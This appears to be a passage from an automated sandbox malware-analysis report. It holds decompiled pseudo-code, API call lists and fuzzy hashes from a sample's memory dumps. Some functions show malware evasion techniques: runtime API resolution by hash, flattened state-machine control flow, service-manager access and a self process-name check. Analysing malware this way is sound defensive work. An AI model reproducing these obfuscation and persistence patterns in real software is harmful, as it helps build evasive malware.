                                                      							continue;
                                                      						}
                                                      						if(_t11 == 0xa04584) {
                                                      							_push(0x104);
                                                      							_push( &_v524);
                                                      							_push(0);
                                                      							 *((intOrPtr*)(E02302F84(0xf568ce83, 0x738e43f2, 0x169)))();
                                                      							_t28 = E02302C80( &_v536);
                                                      							_t43 =  *0x230a4c4; // 0x5b4dc8
                                                      							 *((intOrPtr*)(_t43 + 0x268)) = _t28;
                                                      							_t11 = 0x34cf5423;
                                                      							continue;
                                                      						}
                                                      						if(_t11 == 0x4ef3871) {
                                                      							_t60 = 0x29;
                                                      							_t11 = 0x2edd9354;
                                                      							continue;
                                                      						}
                                                      						if(_t11 != 0x9076f63) {
                                                      							goto L26;
                                                      						}
                                                      						_t29 =  *0x230a4c4; // 0x5b4dc8
                                                      						_push(_t29 + 0x26c);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(_t60);
                                                      						_push(0);
                                                      						 *((intOrPtr*)(E02302F84(0xb7924d94, 0x1a51d89f, 0x269)))(); // executed
                                                      						_t33 = 1;
                                                      						_t61 =  ==  ? _t33 : _t61;
                                                      						_t11 = 0x33b48501;
                                                      					}
                                                      					if(_t11 == 0x2b1f137a) {
                                                      						_t12 = E02303037(0x478);
                                                      						 *0x230a4c4 = _t12;
                                                      						if(_t12 == 0) {
                                                      							_t11 = 0x3b5a6d9f;
                                                      							goto L26;
                                                      						}
                                                      						 *((intOrPtr*)(_t12 + 0x24c)) = E02305798;
                                                      						_t11 = 0x502f5b;
                                                      						goto L1;
                                                      					}
                                                      					if(_t11 == 0x2edd9354) {
                                                      						_push(_t34);
                                                      						 *((intOrPtr*)(E02302F84(0x4836b0ed, 0x28c81fb9, 0x11c)))();
                                                      						goto L14;
                                                      					}
                                                      					if(_t11 == 0x33b48501) {
                                                      						E02305667();
                                                      						_t11 = 0xa04584;
                                                      						goto L1;
                                                      					}
                                                      					if(_t11 != 0x34cf5423) {
                                                      						goto L26;
                                                      					}
                                                      					_push( &_v524);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(0x25);
                                                      					_push(0);
                                                      					 *((intOrPtr*)(E02302F84(0xb7924d94, 0x1a51d89f, 0x269)))();
                                                      					_t48 =  *0x230a4c4; // 0x5b4dc8
                                                      					E02302473(_t48 + 0x228);
                                                      					L20:
                                                      					return _t61;
                                                      					L26:
                                                      				} while (_t11 != 0x3b5a6d9f);
                                                      				goto L20;
                                                      			}






















                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,2895FB0B,?,?), ref: 023068D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: [/P$[/P
                                                      • API String ID: 1889721586-1150913210
                                                      • Opcode ID: 84f37c1f94b1bb65848f54585d75d6298ad84104553592fb2425b5058b72fe0c
                                                      • Instruction ID: 14c9b12b37d51c9e73d57134d4811136dd44a7a5c5c3d0ec8ca671c17a708325
                                                      • Opcode Fuzzy Hash: 84f37c1f94b1bb65848f54585d75d6298ad84104553592fb2425b5058b72fe0c
                                                      • Instruction Fuzzy Hash: 6041AEB17483056BE66C5618DCFEA3A36ADD740348F14082BFA05DB7C9CA26E8618F31
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E0040B748(void* __edi, void* __eflags) {
                                                      				intOrPtr _v0;
                                                      				void* __esi;
                                                      				struct HHOOK__* _t6;
                                                      				void* _t8;
                                                      				void* _t10;
                                                      				intOrPtr _t11;
                                                      				void* _t13;
                                                      				struct HHOOK__* _t14;
                                                      
                                                      				_t10 = __edi;
                                                      				_push(0x4037fd);
                                                      				_t6 = E0040F584(_t8, 0x44642c, __edi, _t13, __eflags);
                                                      				_t14 = _t6;
                                                      				_t16 = _t14;
                                                      				if(_t14 == 0) {
                                                      					_t6 = E004037E3(_t8, 0x44642c, __edi, _t14, _t16);
                                                      				}
                                                      				_push(_t10);
                                                      				_t11 = _v0;
                                                      				if( *((intOrPtr*)(_t14 + 0x14)) != _t11) {
                                                      					if( *(_t14 + 0x28) == 0) {
                                                      						_t6 = SetWindowsHookExA(5, E0040B4F5, 0, GetCurrentThreadId()); // executed
                                                      						_t19 = _t6;
                                                      						 *(_t14 + 0x28) = _t6;
                                                      						if(_t6 == 0) {
                                                      							_t6 = E004037AF(_t8, 0x44642c, _t11, _t14, _t19);
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)(_t14 + 0x14)) = _t11;
                                                      				}
                                                      				return _t6;
                                                      			}












                                                      APIs
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040B773
                                                      • SetWindowsHookExA.USER32 ref: 0040B783
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
                                                      • String ID: ,dD
                                                      • API String ID: 1415497866-3191229884
                                                      • Opcode ID: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
                                                      • Instruction ID: f4f6cd2454f4fa9c59ed38751070ba4084f81d528619c841e15a486b9898b3b2
                                                      • Opcode Fuzzy Hash: 8f866669248ae714854411d0b957cdf2ed001e559e2ffdcb1c22fb3dcb3eb344
                                                      • Instruction Fuzzy Hash: 06F0A7B55007115AD7306F16980571BB698DBE4762F11463FF501B72D0D738E94186AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,022D0005), ref: 022D00E9
                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,022D0005), ref: 022D0111
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22d0000_dot3hc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocInfoNativeSystemVirtual
                                                      • String ID:
                                                      • API String ID: 2032221330-0
                                                      • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                      • Instruction ID: 882a6b2587e0209d14c7bba326e2014e7ffa9318bc8a4d412afa859f8c571c67
                                                      • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                      • Instruction Fuzzy Hash: F0D1F271A183079FD714CFA9C88476AB3E0FF84318F18852DE895CB265E7B4EA45CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004024B0(intOrPtr __ecx, char* _a4, char* _a8) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				int* _v16;
                                                      				int _v20;
                                                      				int _v24;
                                                      				intOrPtr _v28;
                                                      				long _t24;
                                                      				long _t28;
                                                      				char* _t39;
                                                      
                                                      				_v28 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t39 =  *0x442000; // 0x4346d4
                                                      				_t24 = RegCreateKeyExA(0x80000002, _t39, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12); // executed
                                                      				_v16 = _t24;
                                                      				if(_v16 == 0) {
                                                      					_v24 = 4;
                                                      					 *_a4 = 1;
                                                      					_t28 = RegQueryValueExA(_v8, _a8, 0,  &_v20, _a4,  &_v24); // executed
                                                      					_v16 = _t28;
                                                      					if(_v16 != 0) {
                                                      						_v16 = E00402440(_v28,  *_a4, _a8);
                                                      					}
                                                      					RegCloseKey(_v8); // executed
                                                      				}
                                                      				return _v16;
                                                      			}













                                                      APIs
                                                      • RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
                                                      • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00402545
                                                        • Part of subcall function 00402440: RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402471
                                                        • Part of subcall function 00402440: RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 00402492
                                                        • Part of subcall function 00402440: RegCloseKey.ADVAPI32(00000000), ref: 0040249F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue$Query
                                                      • String ID:
                                                      • API String ID: 4008097885-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040A2E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t39;
                                                      				intOrPtr _t56;
                                                      				signed int _t58;
                                                      				signed int _t62;
                                                      				intOrPtr _t70;
                                                      				signed int _t76;
                                                      				void* _t78;
                                                      				void* _t82;
                                                      				intOrPtr _t83;
                                                      
                                                      				_t82 = __eflags;
                                                      				_push(0x38);
                                                      				E0041F71D(E004323F0, __ebx, __edi, __esi);
                                                      				_push(0x4037fd);
                                                      				_t56 = E0040F584(__ebx, 0x44642c, __edi, __esi, _t82);
                                                      				_t83 = _t56;
                                                      				 *((intOrPtr*)(_t78 - 0x14)) = _t56;
                                                      				_t84 = _t83 == 0;
                                                      				if(_t83 == 0) {
                                                      					E004037E3(_t56, 0x44642c, __edi, __esi, _t84);
                                                      				}
                                                      				_t4 = _t56 + 0x58; // 0x58
                                                      				_t58 = 7;
                                                      				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
                                                      				_t70 =  *((intOrPtr*)(_t78 + 0x10));
                                                      				_t76 =  *(_t78 + 8);
                                                      				 *_t39 =  *(_t78 + 0xc);
                                                      				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
                                                      				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
                                                      				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
                                                      				 *((intOrPtr*)(_t78 - 4)) = 0;
                                                      				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
                                                      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
                                                      				}
                                                      				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                      				if(_t70 == 0x110) {
                                                      					E004089E1(_t76, _t78 - 0x28, _t78 + 8);
                                                      				}
                                                      				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x108))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
                                                      				if(_t70 == 0x110) {
                                                      					E0040A26C(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
                                                      				}
                                                      				_t30 = _t56 + 0x58; // 0x58
                                                      				_t62 = 7;
                                                      				return E0041F7C2(memcpy(_t30, _t78 - 0x44, _t62 << 2));
                                                      			}













                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 0040A2EF
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                      • String ID: ,dD
                                                      • API String ID: 24280941-3191229884
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E004011D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
                                                      				intOrPtr _v8;
                                                      				char _v16;
                                                      				intOrPtr _v20;
                                                      				char _v336;
                                                      				intOrPtr _v340;
                                                      				intOrPtr _v352;
                                                      				void* __ebp;
                                                      				signed int _t18;
                                                      				intOrPtr _t26;
                                                      				signed int _t42;
                                                      
                                                      				_t39 = __edx;
                                                      				_t18 =  *0x443590; // 0x8ffedb05
                                                      				 *[fs:0x0] =  &_v16;
                                                      				_v352 = __ecx;
                                                      				__imp__#17(_t18 ^ _t42,  *[fs:0x0], E00431A3B, 0xffffffff);
                                                      				E00404019(_v352);
                                                      				E00407105(__ebx, __edi, 0);
                                                      				E00406622(__ebx, _v352, __edx, __edi, _t42, "Local AppWizard-Generated Applications");
                                                      				E00401450(__ebx,  &_v336, __edi, __esi, _t18 ^ _t42, 0); // executed
                                                      				_v8 = 0;
                                                      				 *((intOrPtr*)(_v352 + 0x20)) =  &_v336;
                                                      				_t26 = E0040638F(__ebx,  &_v336, _t39, __edi, __esi, _t18 ^ _t42); // executed
                                                      				_v20 = _t26;
                                                      				_v340 = 0;
                                                      				_v8 = 0xffffffff;
                                                      				E00401290( &_v336, _t18 ^ _t42);
                                                      				 *[fs:0x0] = _v16;
                                                      				return _v340;
                                                      			}














                                                      APIs
                                                      • #17.COMCTL32(8FFEDB05), ref: 004011FE
                                                        • Part of subcall function 00404019: InterlockedExchange.KERNEL32(00447344,?), ref: 00404045
                                                        • Part of subcall function 00406622: __strdup.LIBCMT ref: 00406631
                                                        • Part of subcall function 00406622: __strdup.LIBCMT ref: 00406644
                                                        • Part of subcall function 0040638F: __EH_prolog3_catch.LIBCMT ref: 00406396
                                                        • Part of subcall function 0040638F: FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
                                                        • Part of subcall function 0040638F: LoadResource.KERNEL32(?,00000000), ref: 004063D1
                                                        • Part of subcall function 0040638F: LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2
                                                        • Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012E4
                                                        • Part of subcall function 00401290: ~_Task_impl.LIBCPMT ref: 004012F3
                                                      Strings
                                                      • Local AppWizard-Generated Applications, xrefs: 00401219
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Resource$Task_impl__strdup$ExchangeFindH_prolog3_catchInterlockedLoadLock
                                                      • String ID: Local AppWizard-Generated Applications
                                                      • API String ID: 2756291502-3869840320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E02303037(long __ecx) {
                                                      				void* _t2;
                                                      				void* _t4;
                                                      				long _t12;
                                                      
                                                      				_t12 = __ecx;
                                                      				_t2 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x71eb2479, 0x14d)))();
                                                      				E02302F84(0xf568ce83, 0x91b79ad5, 0x51);
                                                      				_t4 = RtlAllocateHeap(_t2, 8, _t12); // executed
                                                      				return _t4;
                                                      			}







                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,684DEBFF), ref: 02303067
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: y$q
                                                      • API String ID: 1279760036-2681802098
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E02302FDF(void* __ecx) {
                                                      				void* _t2;
                                                      				char _t4;
                                                      				void* _t12;
                                                      
                                                      				_t12 = __ecx;
                                                      				_t2 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x71eb2479, 0x14d)))();
                                                      				E02302F84(0xf568ce83, 0x5e575f04, 0x1e3);
                                                      				_t4 = RtlFreeHeap(_t2, 0, _t12); // executed
                                                      				return _t4;
                                                      			}







                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000000,005B4C50), ref: 02303012
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: y$q
                                                      • API String ID: 3298025750-2681802098
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E02306B8A() {
                                                      				short _v520;
                                                      				short _v1040;
                                                      				char _v1044;
                                                      				void* _t7;
                                                      				void* _t38;
                                                      
                                                      				_t38 = 0;
                                                      				_t7 = 0x1bd2fc4;
                                                      				do {
                                                      					while(_t7 != 0x1bd2fc4) {
                                                      						if(_t7 == 0x5094b24) {
                                                      							_v1044 = 0x104;
                                                      							_push( &_v1044);
                                                      							_push( &_v1040);
                                                      							_push(_t38);
                                                      							_push( *((intOrPtr*)(E02302F84(0xf568ce83, 0x5bc29570, 0x42)))());
                                                      							 *((intOrPtr*)(E02302F84(0xf568ce83, 0xa87adc75, 0xf3)))(); // executed
                                                      							_t7 = 0x11b4854a;
                                                      							continue;
                                                      						} else {
                                                      							if(_t7 == 0x11b4854a) {
                                                      								E02302F84(0xf568ce83, 0xb3bb28d3, 0x1f5);
                                                      								lstrcmpiW( &_v520,  &_v1040); // executed
                                                      								_t38 =  !=  ? 1 : _t38;
                                                      							} else {
                                                      								if(_t7 != 0x2c2c1f14) {
                                                      									goto L8;
                                                      								} else {
                                                      									_push(0x104);
                                                      									_push( &_v520);
                                                      									_push(_t38);
                                                      									 *((intOrPtr*)(E02302F84(0xf568ce83, 0x738e43f2, 0x169)))();
                                                      									_t7 = 0x5094b24;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      						L11:
                                                      						return _t38;
                                                      					}
                                                      					_t7 = 0x2c2c1f14;
                                                      					L8:
                                                      				} while (_t7 != 0x33f64f2f);
                                                      				goto L11;
                                                      			}









                                                      APIs
                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 02306C1D
                                                      • lstrcmpiW.KERNELBASE(?,?), ref: 02306C54
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuerylstrcmpi
                                                      • String ID:
                                                      • API String ID: 2545454535-0
                                                      • Opcode ID: 5dfd3e8c6682f6c2c25700c613ab13e3214481ee3b8306550b88c3a18468c797
                                                      • Instruction ID: b1cfc1176f8bfa462aa2622817e3264d255b59a14bb89ddd107b98e1dd9ac983
                                                      • Opcode Fuzzy Hash: 5dfd3e8c6682f6c2c25700c613ab13e3214481ee3b8306550b88c3a18468c797
                                                      • Instruction Fuzzy Hash: A41138B130831557D538E5649CE5ABFA6CEDBC4754F50093BED02C72C4CF61C9898AB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E0040D3F7(void* __ecx) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t28;
                                                      				intOrPtr _t38;
                                                      				intOrPtr _t42;
                                                      				void* _t43;
                                                      				struct HINSTANCE__* _t44;
                                                      				intOrPtr _t45;
                                                      				void* _t47;
                                                      				intOrPtr _t48;
                                                      				signed int _t49;
                                                      				void* _t51;
                                                      
                                                      				_t49 = _t51 - 0x1b0;
                                                      				_t28 =  *0x443590; // 0x8ffedb05
                                                      				 *(_t49 + 0x1ac) = _t28 ^ _t49;
                                                      				_push(_t43);
                                                      				_t47 = __ecx;
                                                      				E0040D31A(_t28 ^ _t49, _t38, __ecx, _t42, _t43, __ecx);
                                                      				_t44 =  *(__ecx + 8);
                                                      				 *(_t49 + 0x1aa) =  *(_t49 + 0x1aa) & 0x00000000;
                                                      				 *(_t49 + 0x1a8) =  *(_t49 + 0x1a8) & 0x00000000;
                                                      				if(GetModuleFileNameW(_t44, _t49 - 0x60, 0x105) != 0) {
                                                      					if( *(_t49 + 0x1a8) == 0) {
                                                      						 *((intOrPtr*)(_t49 - 0x78)) = _t49 - 0x60;
                                                      						_push(_t49 - 0x80);
                                                      						 *((intOrPtr*)(_t49 - 0x80)) = 0x20;
                                                      						 *((intOrPtr*)(_t49 - 0x7c)) = 0x88;
                                                      						 *((intOrPtr*)(_t49 - 0x6c)) = 2;
                                                      						 *(_t49 - 0x64) = _t44;
                                                      						_t32 = E0040D388(); // executed
                                                      						 *(_t47 + 0x80) = _t32;
                                                      						if(_t32 == 0xffffffff) {
                                                      							_push(_t49 - 0x80);
                                                      							 *((intOrPtr*)(_t49 - 0x6c)) = 3;
                                                      							_t32 = E0040D388(); // executed
                                                      							 *(_t47 + 0x80) = _t32;
                                                      						}
                                                      						if( *(_t47 + 0x80) == 0xffffffff) {
                                                      							_push(_t49 - 0x80);
                                                      							 *((intOrPtr*)(_t49 - 0x6c)) = 1;
                                                      							_t32 = E0040D388(); // executed
                                                      							 *(_t47 + 0x80) = _t32;
                                                      							if(_t32 == 0xffffffff) {
                                                      								 *(_t47 + 0x80) =  *(_t47 + 0x80) & 0x00000000;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						SetLastError(0x6f);
                                                      					}
                                                      				}
                                                      				_pop(_t45);
                                                      				_pop(_t48);
                                                      				return E0041E5DF(_t32, _t38,  *(_t49 + 0x1ac) ^ _t49, _t42, _t45, _t48);
                                                      			}

















                                                      APIs
                                                        • Part of subcall function 0040D31A: GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
                                                      • SetLastError.KERNEL32(0000006F), ref: 0040D452
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Module$ErrorFileHandleLastName
                                                      • String ID:
                                                      • API String ID: 613274587-0
                                                      • Opcode ID: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
                                                      • Instruction ID: 4c084dd07903f31f2770e49e5958585a6a5082f204e8c6cb463d0be25484e369
                                                      • Opcode Fuzzy Hash: 1140d22a4bc11586fb8b33a2693fa1d88d0dedf6a9c8d0f90cf5dd9a28d1640f
                                                      • Instruction Fuzzy Hash: 4C213D71D003088EEB60DFA5D8487EEB7B8BB05318F50463EE869AA1C1DB786549CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00422C5D(intOrPtr _a4) {
                                                      				void* _t6;
                                                      				intOrPtr _t7;
                                                      				void* _t10;
                                                      
                                                      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                      				 *0x4468d0 = _t6;
                                                      				if(_t6 != 0) {
                                                      					_t7 = E00422C02(__eflags);
                                                      					__eflags = _t7 - 3;
                                                      					 *0x448500 = _t7;
                                                      					if(_t7 != 3) {
                                                      						L5:
                                                      						__eflags = 1;
                                                      						return 1;
                                                      					} else {
                                                      						_t10 = E00422E5E(0x3f8);
                                                      						__eflags = _t10;
                                                      						if(_t10 != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							HeapDestroy( *0x4468d0);
                                                      							 *0x4468d0 =  *0x4468d0 & 0x00000000;
                                                      							goto L1;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					return 0;
                                                      				}
                                                      			}







                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F5BB,00000001), ref: 00422C6E
                                                      • HeapDestroy.KERNEL32 ref: 00422CA4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Heap$CreateDestroy
                                                      • String ID:
                                                      • API String ID: 3296620671-0
                                                      • Opcode ID: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
                                                      • Instruction ID: 50605b1b86adc46f172317f474ea2ef838b38f67434d95992fa8f4b769136fec
                                                      • Opcode Fuzzy Hash: e3816043460115e40a224fd5a361c21cc7ac43806d8953fad7d81c4a3159e2c6
                                                      • Instruction Fuzzy Hash: 9EE06D35715322BAEB047F32BF0576A36E4A742746F41443AF501C50A0FBB88550961E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004080C3(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
                                                      				_Unknown_base(*)()* _t11;
                                                      				long _t12;
                                                      				intOrPtr* _t17;
                                                      
                                                      				_t17 = __ecx;
                                                      				_t11 =  *(__ecx + 0x40);
                                                      				if(_t11 != 0) {
                                                      					L3:
                                                      					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
                                                      					return _t12;
                                                      				}
